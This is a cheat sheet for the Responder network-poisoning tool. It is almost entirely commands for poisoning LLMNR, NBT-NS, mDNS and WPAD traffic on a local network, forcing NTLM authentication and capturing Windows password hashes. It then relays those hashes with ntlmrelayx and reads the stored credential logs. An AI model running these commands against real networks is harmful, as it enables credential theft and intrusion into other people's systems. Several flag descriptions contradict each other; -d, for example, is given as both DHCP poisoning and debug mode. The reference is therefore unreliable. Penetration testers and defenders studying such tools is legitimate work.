Responder Logo
Responder is a LLMNR, NBT-NS, and MDNS poisoner. It answers specific queries on a network to divert traffic to the attacker's machine, allowing for the capture of NTLMv1/v2 hashes.

Installation

Install Responder on Debian/Kali

sudo apt update && sudo apt install responder

From Source

git clone https://github.com/lgandx/Responder.git
cd Responder
pip3 install -r requirements.txt
sudo python3 Responder.py --help

Basic Usage

sudo responder -I eth0             #Start Responder poisoning on interface eth0
sudo responder -I eth0 -v          #Enable verbose output
sudo responder -I eth0 -dw         #Enable WPAD and HTTP authentication capture
sudo responder -I eth0 -A          #Analyze mode (no poisoning)
sudo responder -I eth0 -v -FDdP    #All out attack

Interface Selection

ip a                            #Identify available interfaces
sudo responder -I eth0          #Run Responder on ethernet interface
sudo responder -I wlan0         #Run Responder on wireless interface
sudo responder -I tun0          #Run through VPN interface

LLMNR / NBT-NS / mDNS Poisoning

sudo responder -I eth0 -rdw  #Enable LLMNR, NBT-NS, and WPAD poisoning
sudo responder -I eth0 -r    #Enable NetBIOS Name Service poisoning
sudo responder -I eth0 -d    #Enable DHCP poisoning
sudo responder -I eth0 -m    #Enable mDNS poisoning

Credential Capture

sudo responder -I eth0 -v     #Capture NTLMv1/NTLMv2 authentication attempts
sudo responder -I eth0 -wrf   #Force WPAD authentication and capture hashes
sudo responder -I eth0 -F     #Force NTLM authentication
sudo responder -I eth0 -w     #Start WPAD rogue proxy server

Common Attack Scenarios

Capture Windows NTLMv2 Hashes

sudo responder -I eth0 -v     #Passively capture NTLM authentication
sudo responder -I eth0 -rdwv  #Capture hashes via LLMNR/NBT-NS poisoning

WPAD Rogue Proxy Attack

sudo responder -I eth0 -w    #Enable WPAD rogue proxy
sudo responder -I eth0 -wdF  #Force authentication through WPAD

Passive Network Analysis

sudo responder -I eth0 -A    #Analyze traffic without poisoning
sudo responder -I eth0 -Av   #Analyze mode with verbose output

Integration With Other Tools

Responder & ntlmrelayx

sudo responder -I eth0 -rdwv                  #Capture NTLM authentication
ntlmrelayx.py -tf targets.txt -smb2support    #Relay captured credentials

Hash Storage Locations

cat /usr/share/responder/logs/SMB-NTLMv2-SSP-*    #View captured SMB hashes
cat /usr/share/responder/logs/HTTP-NTLMv2-*       #View captured HTTP authentication hashes
cat /usr/share/responder/logs/*                   #View all captured credentials

Responder Configuration

nano /etc/responder/Responder.conf       #Edit Responder configuration
cat /etc/responder/Responder.conf        #View current configuration
grep SMB /etc/responder/Responder.conf   #Check SMB poisoning settings

Responder Servers

sudo responder -I eth0 -rdwv   #Enable SMB, HTTP, HTTPS credential capture
sudo responder -I eth0 -wF     #WPAD proxy with forced authentication
sudo responder -I eth0 -rf     #Enable NetBIOS and authentication forcing

Verbose & Debug Modes

sudo responder -I eth0 -v    #Verbose output
sudo responder -I eth0 -vv   #Extra verbose output
sudo responder -I eth0 -d    #Debug mode

Stopping Responder

CTRL + C                    #Stop Responder poisoning
ps aux | grep responder     #Check if Responder is still running
sudo killall python3        #Kill Responder process